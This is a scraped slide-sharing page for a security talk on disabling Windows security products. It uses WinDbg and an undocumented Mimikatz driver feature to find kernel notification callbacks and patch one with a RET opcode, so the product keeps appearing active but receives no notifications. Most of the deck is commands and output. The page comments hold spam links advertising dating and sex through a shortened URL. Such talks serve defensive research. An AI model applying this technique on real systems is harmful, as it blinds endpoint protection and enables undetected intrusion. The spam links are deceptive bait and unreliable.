Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Killing any security product … using a Mimikatz undocumented feature

5,745 views

Published on

Published in: Technology
  • Follow the link, new dating source: ❶❶❶ http://bit.ly/39sFWPG ❶❶❶
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Sex in your area is here: ❶❶❶ http://bit.ly/39sFWPG ❶❶❶
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Killing any security product … using a Mimikatz undocumented feature

  1. 1. Killing any security product … using a Mimikatz undocumented feature @newsoft
  2. 2. How to write a security product for Windows? “There is only one way to do it” … since Windows Vista
  3. 3. How to write a security product for Windows? ObRegisterCallbacks PsSetCreateProcessNotifyRoutine (process) PsSetCreateProcessNotifyRoutineEx PsSetCreateThreadNotifyRoutine (thread) PsSetCreateThreadNotifyRoutineEx PsSetLoadImageNotifyRoutine CmRegisterCallback (registry) CmRegisterCallbackEx FltRegisterFilter (file) FltStartFiltering
  4. 4. Finding process callbacks with WinDbg kd> dd nt!PspCreateProcessNotifyRoutineCount l1 fffff800`02a821a4 00000005 kd> dd nt!PspCreateProcessNotifyRoutineExCount l1 fffff800`02a821a0 00000002 kd> dp nt!PspCreateProcessNotifyRoutine l8 fffff800`02a81fa0 fffff8a0`00008d6f fffff8a0`001b79ff fffff800`02a81fb0 fffff8a0`002e784f fffff8a0`002e7bff fffff800`02a81fc0 fffff8a0`003f295f fffff8a0`001dc53f fffff800`02a81fd0 fffff8a0`031ef24f 00000000`00000000
  5. 5. Other callbacks kd> dd nt!PspCreatethreadNotifyRoutineCount l1 <<< Thread fffff800`02a81f80 00000000 kd> dd nt!PspLoadImageNotifyRoutineCount l1 <<< Image load fffff800`02a81d60 00000002 kd> dp nt!PspLoadImageNotifyRoutine l3 fffff800`02a81d20 fffff8a0`000927ef fffff8a0`002a23cf fffff800`02a81d30 00000000`00000000 kd> dd nt!CmpCallBackCount l1 <<< Registry fffff800`02a63b04 00000001 kd> x nt!CallbackListHead fffff800`02ad8970 nt!CallbackListHead = <no type information>
  6. 6. We need automation! Enter Mimikatz magic ...
  7. 7. Magic command #1 mimikatz # !+ [*] mimikatz driver not present [+] mimikatz driver successfully registered [+] mimikatz driver ACL to everyone [+] mimikatz driver started
  8. 8. Magic command #2 mimikatz # !notifObject ... * Process * Callback [type 3] PreOperation : 0xFFFFF880035B66E0 [ehdrv.sys + 0x0001c6e0] Open - 0xFFFFF80002D9D300 [ntoskrnl.exe + 0x00348300] Close - 0xFFFFF80002D83010 [ntoskrnl.exe + 0x0032e010] Delete - 0xFFFFF80002D822C0 [ntoskrnl.exe + 0x0032d2c0] Security - 0xFFFFF80002DB52A0 [ntoskrnl.exe + 0x003602a0] ...
  9. 9. Back in WinDbg kd> e ehdrv+0x0001c6e0 c3 0xC3 == RET opcode After this patch, the notification callback will do nothing Unlinking from the callbacks list is also doable ● Requires more work ... ● … but is less detectable (no code alteration)
  10. 10. Conclusion Cons ● You need kernel write access ○ Being able to write a single NULL byte is enough, though Pros ● Will kill any security tool ● The software will still be “active and running” from a monitoring point of view - just not being notified

×